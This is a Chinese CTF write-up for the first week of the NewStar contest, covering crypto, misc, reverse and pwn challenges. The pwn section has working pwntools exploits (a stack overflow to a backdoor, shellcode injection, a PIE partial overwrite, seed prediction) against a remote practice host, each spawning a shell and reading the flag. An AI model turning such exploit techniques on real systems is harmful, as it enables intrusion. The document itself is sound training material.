最近没什么正式比赛,都是入门赛,有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。
这周newstar第1周结束了,据说py得很厉害,第2周延期了,什么时候开始还不一定,不过第一周已经结束提交了,可以发上来存下。总体来说没难题。
Crypto
brainfuck
javascript
++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.直接到网站解密 Brainfuck/OoK加密解密 - Bugku CTF
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Caesar's Secert
kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}
随波逐流工具一键解密
key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy}
Fence
fa{ereigtepanet6680}lgrodrn_h_litx#8fc3
同样随波,W栅栏
flag{reordering_the_plaintext#686f8c03}
Vigenère
pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}
试密钥,逐个字母试,使头为flag,也可以从 vigenere的表上查
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyencoding
flag由3段组成,第1段是base64,第2段是base32,第3段是uuencode
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
不过这个uuencode需要在 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍--查错网
上解码,随波上后部是乱码
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
babyrsa
n是由一堆小素数组成,可以直接分解
python
from Crypto.Util.number import *
from flag import flag
def gen_prime(n):
res = 1
for i in range(15):
res *= getPrime(n)
return res
if __name__ == '__main__':
n = gen_prime(32)
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(c)
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595在sage上直接得到phi
python
phi = euler_phi(n)
d = inverse_mod(0x10001, phi)
m = pow(c,d,n)
l2b(int(m))
b'flag{us4_s1ge_t0_cal_phI}'Small d
d很小,直接用winer
python
from secret import flag
from Crypto.Util.number import *
p = getPrime(1024)
q = getPrime(1024)
d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)
c = pow(m,e,n)
print(c)
print(e)
print(n)
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
python
#sage
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):
res = []
while y:
res.append(x//y)
x,y = y,x%y
return res
def continued_fraction(res):
numerator,denominator = 1,0
for i in res[::-1]:
denominator,numerator = numerator,i*numerator+denominator
return numerator,denominator
def wiener_attack(c,res,n):
print("Attack start...")
for i in range(1,len(res)):
ress = res[:i]
d = continued_fraction(ress)[1]
m = long_to_bytes(int(pow(c,d,n)))
#if all(0x20<=k<=0x7f for k in m):
if b'flag{' in m:
print(m)
break
res = transform(e,n)
wiener_attack(c,res,n)
#Attack start...
#b'flag{learn_some_continued_fraction_technique#dc16885c}'babyxor
1字节异或加密,直接爆破
python
from secret import *
ciphertext = []
for f in flag:
ciphertext.append(f ^ key)
print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2
python
enc = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):
tmp = bytes([i^v for v in enc])
if b'flag' in tmp:
print(tmp)
#flag{x0r_15_symm3try_and_e4zy!!!!!!}Affine
仿射密码
python
from flag import flag, key
modulus = 256
ciphertext = []
for f in flag:
ciphertext.append((key[0]*f + key[1]) % modulus)
print(bytes(ciphertext).hex())
# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064因为两个key都很小,可以直接用flag{头爆破出来
python
enc = bytes.fromhex('dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
for i in range(256):
for j in range(256):
if bytes([(i*v+j)%256 for v in b'flag{']) == enc[:5]:
print(i,j)
a,b = 17,23
flag = ''
for i in range(len(enc)):
for k in range(0x21,0x7f):
if (a*k + b)%256 == enc[i]:
flag += chr(k)
break
print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}babyaes
python
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
def pad(data):
return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])
def main():
flag_ = pad(flag)
key = os.urandom(16) * 2
iv = os.urandom(16)
print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
aes = AES.new(key, AES.MODE_CBC, iv)
enc_flag = aes.encrypt(flag_)
print(enc_flag)
if __name__ == "__main__":
main()key有16*2字节,iv只有16字节,前部爆露,可以得到key和iv然后直接解密
python
hint = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
key = long_to_bytes(hint^1)[:16]*2
iv = long_to_bytes(hint^1^bytes_to_long(key))
aes = AES.new(key, AES.MODE_CBC, iv)
aes.decrypt(enc)
#b'firsT_cry_Aes\x00\x00\x00'
#flag{firsT_cry_Aes}MISC
CyberChef's Secret
怀疑这是crypto过来的
M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=
直接叫厨子
机密图片
一个图片是个二维码,显然不是flag,用StegSolver
流量!鲨鱼!
流量题,用wireshark打开,可以看到好多 http访问,接协议排序找到可疑项
追踪http流得到密文
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
上厨子,点魔术棒两次
压缩包们
附件用010打开,发现是zip文件少头,改头为504b0304,后部有base64的提示
解出提示是
I like six-digit numbers because they are very concise and easy to remember.
就是说6位数字密码,爆破6位数字,爆破报错,说明压缩包密码方式有误,用010修改下把0改为0
然后爆破密码,得到flag
空白格
压缩包打开是个由空格和tab组成的空白文件,把空格换成0,tab换成1,每行只取后8字符(这里中间还都插着个1不知怎么出来的)
python
a = open('white.txt').readlines()
flag = ''
for v in a:
v = v[:-1].replace(' ', '0').replace('\t', '1')
flag += chr(int(v[-8:],2))
print(flag.replace(chr(1),''))隐秘的眼睛
显然是提到眼睛就是silenteye
PWN
ret2text
read有溢出,直接写后门
python
from pwn import *
p = remote('node4.buuoj.cn',29584)
context.log_level = 'debug'
p.sendlineafter(b"Show me your magic", b'\x00'*0x28 + p64(0x4011fb))
print(p.sendline(b'cat flag'))
p.interactive()ezshellcode
建了个可写可执行的块把shellcode读进去然后执行
python
from pwn import *
p = remote('node4.buuoj.cn',29612)
context(arch='amd64', log_level = 'debug')
p.sendlineafter(b"Show me your magic", asm(shellcraft.sh()))
print(p.sendline(b'cat flag'))
p.interactive()newstar shop
这题主要是看代码,
一共有100块,买gift花40两次,再运行3 减50变成负数,再买flag即可
输入:1,2,1,2,3,1,3
cpp
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+8h] [rbp-8h]
v4 = __readfsqword(0x28u);
init();
while ( 1 )
{
menu();
if ( (int)__isoc99_scanf("%d", &v3) <= 0 )
puts("Invalid input");
switch ( v3 )
{
case 1:
shop();
break;
case 2:
makemoney();
break;
case 3:
dont_try();
break;
default:
puts("nothing here");
puts("\n");
break;
}
}
}
unsigned __int64 shop()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("=============================");
puts("===Welcome to newstar shop===");
puts("=============================");
puts("1.newstar's gift 20$");
puts("2.pwn write up 40$");
puts("3.shell 9999$");
puts("\n");
puts("All things are only available for one day!");
puts("What do you want to buy?");
puts("\n");
if ( (int)__isoc99_scanf("%d", &v1) <= 0 )
puts("Invalid input");
if ( v1 != 3 )
{
if ( v1 > 3 )
{
LABEL_17:
puts("nothing here");
puts("\n");
return v2 - __readfsqword(0x28u);
}
if ( v1 == 1 )
{
if ( (unsigned int)money > 0x13 )
{
money -= 20;
puts("You buy a newstar's gift");
puts("That is the gift:");
puts("What will happen when int transfer to unsigned int?");
goto LABEL_10;
}
}
else
{
if ( v1 != 2 )
goto LABEL_17;
if ( (unsigned int)money > 0x27 )
{
money -= 40;
puts("You buy a pwn write up");
puts("That is free after the match,haha");
goto LABEL_10;
}
}
puts("Sorry,you don't have enough money");
LABEL_10:
puts("\n");
return v2 - __readfsqword(0x28u);
}
if ( (unsigned int)money > 0x270E )
{
money = 0;
puts("How do you buy it?");
puts("\n");
system("/bin/sh");
}
else
{
puts("Sorry,you don't have enough money");
puts("\n");
}
return v2 - __readfsqword(0x28u);
}p1eee
跟前边第1题类似,read有溢出还有后门,不过后门没直接给出
cpp
ssize_t sub_120E()
{
__int64 buf[4]; // [rsp+0h] [rbp-20h] BYREF
memset(buf, 0, sizeof(buf));
puts("A nice try to break pie!!!");
return read(0, buf, 0x29uLL);
}后门
python
from pwn import *
p = remote('node4.buuoj.cn',25970)
context(arch='amd64', log_level = 'debug')
p.sendafter(b"A nice try to break pie!!!", b'\x00'*0x28 + p8(0x6c))
print(p.sendline(b'cat flag'))
p.interactive()Random
猜对一个数即可
cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v3; // bl
int v4; // eax
int v6; // [rsp+4h] [rbp-2Ch] BYREF
unsigned int seed; // [rsp+8h] [rbp-28h]
int v8; // [rsp+Ch] [rbp-24h]
_BYTE v9[5]; // [rsp+13h] [rbp-1Dh] BYREF
unsigned __int64 v10; // [rsp+18h] [rbp-18h]
v10 = __readfsqword(0x28u);
init(argc, argv, envp);
seed = time(0LL);
srand(seed);
v8 = rand();
puts("can you guess the number?");
__isoc99_scanf("%d", &v6);
if ( v8 == v6 )
{
qmemcpy(v9, "2$031", sizeof(v9));
v3 = v9[rand() % 5];
v4 = rand();
sy(v9[v4 % 2], v3);
}
else
{
printf("%s", "Haha you are wrong");
}
return 0;
}用ctypes库猜一个数
python
from ctypes import *
from pwn import *
clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
p = remote('node4.buuoj.cn',26584)
context(arch='amd64', log_level = 'debug')
clibc.srand(clibc.time(0))
v =clibc.rand()
p.sendlineafter(b"can you guess the number?", str(v).encode())
p.sendline(b'/bin/sh')
p.sendline(b'cat flag')
p.interactive()REVERSE
easy_RE
IDA一打开就看到一半
再反编译又是一半
咳
加密方法就是加1
python
>>> a = b'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
>>> bytes([v-1 for v in a])
b'flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}'Segments
根据题目名字查看段
ELF
第二步是base64
cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // edx
char *s1; // [rsp+0h] [rbp-20h]
char *v6; // [rsp+8h] [rbp-18h]
char *s; // [rsp+10h] [rbp-10h]
s = (char *)malloc(0x64uLL);
printf("Input flag: ");
fgets(s, 100, stdin);
s[strcspn(s, "\n")] = 0;
v6 = encode(s);
v3 = strlen(v6);
s1 = base64_encode((__int64)v6, v3);
if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
puts("Correct");
else
puts("Wrong");
free(v6);
free(s1);
free(s);
return 0;
}第1步encode是与0x20异或
cpp
_BYTE *__fastcall encode(const char *a1)
{
size_t v1; // rax
int v2; // eax
_BYTE *v4; // [rsp+20h] [rbp-20h]
int i; // [rsp+28h] [rbp-18h]
int v6; // [rsp+2Ch] [rbp-14h]
v1 = strlen(a1);
v4 = malloc(2 * v1 + 1);
v6 = 0;
for ( i = 0; i < strlen(a1); ++i )
{
v2 = v6++;
v4[v2] = (a1[i] ^ 0x20) + 16;
}
v4[v6] = 0;
return v4;
}
python
a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
b = b64decode(a)
bytes([(v-16)^0x20 for v in b])
b'flag{D0_4ou_7now_wha7_ELF_1s?}'Endian
这是大端小端的意思
cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
int i; // [rsp+4h] [rbp-3Ch]
char *v5; // [rsp+8h] [rbp-38h]
char v6[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v7; // [rsp+38h] [rbp-8h]
v7 = __readfsqword(0x28u);
puts("please input your flag");
__isoc99_scanf("%s", v6);
v5 = v6;
for ( i = 0; i <= 4; ++i )
{
if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
{
printf("wrong!");
exit(0);
}
v5 += 4;
}
printf("you are right");
return 0;
}加密只是作了个异或
python
>>> enc = [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]
>>> a = [0x12345678 ^ v for v in enc]
>>>
>>> a
[1734437990, 1768713339, 1600943220, 1768189509, 1633644129]
>>> long_to_bytes(a[0])
b'galf'
>>> from pwn import p32
>>> b''.join(p32(v) for v in a)
b'flag{llittl_Endian_a'
>>>AndroXor
用jadx打开,可以看到密文,key(异或)
java
public class MainActivity extends AppCompatActivity {
private ActivityMainBinding binding;
static {
System.loadLibrary("androxor");
}
public String Xor(String str, String str2) {
char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
char[] cArr2 = new char[str.length()];
String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
for (int i = 0; i < str.length(); i++) {
char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
cArr2[i] = charAt;
if (cArr[i] != charAt) {
return "wrong!!!";
}
}
return str3;
}
/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
public void onCreate(Bundle bundle) {
super.onCreate(bundle);
ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
this.binding = inflate;
setContentView(inflate.getRoot());
final EditText editText = (EditText) findViewById(R.id.password);
((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1
@Override // android.view.View.OnClickListener
public void onClick(View view) {
String obj = editText.getText().toString();
MainActivity mainActivity = MainActivity.this;
Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
Log.d("输入", editText.getText().toString());
}
});
}
}
python
c = [14,ord('\r'), 17, 23, 2, ord('K'), ord('I'), ord('7'), ord(' '), 30, 20, ord('I'), ord('\n'), 2, ord('\f'), ord('>'), ord('('), ord('@'), 11, ord('\''), ord('K'), ord('Y'), 25, ord('A'), ord('\r')]
key = b'happyx3'
xor(bytes(c),key)
#flag{3z_And0r1d_X0r_x1x1}EzPE
又是下异或,这是第1个字符是序号和第2个异或
python
enc = bytes.fromhex('0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D')
flag = 'f'
for i in range(len(enc)):
for k in range(0x20,0x7f):
if ord(flag[i])^k^i == enc[i]:
flag += chr(k)
break
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}lazy_activtiy
又是个APK文件,从程序里看点击够10000就出flag
这里的editText就是flag
打开layout,找到用户定义的资源
